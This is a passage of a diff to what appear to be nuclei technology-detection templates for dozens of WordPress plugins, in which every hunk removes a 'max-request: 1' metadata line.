a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 23a88ea130..88d38e21ed 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: 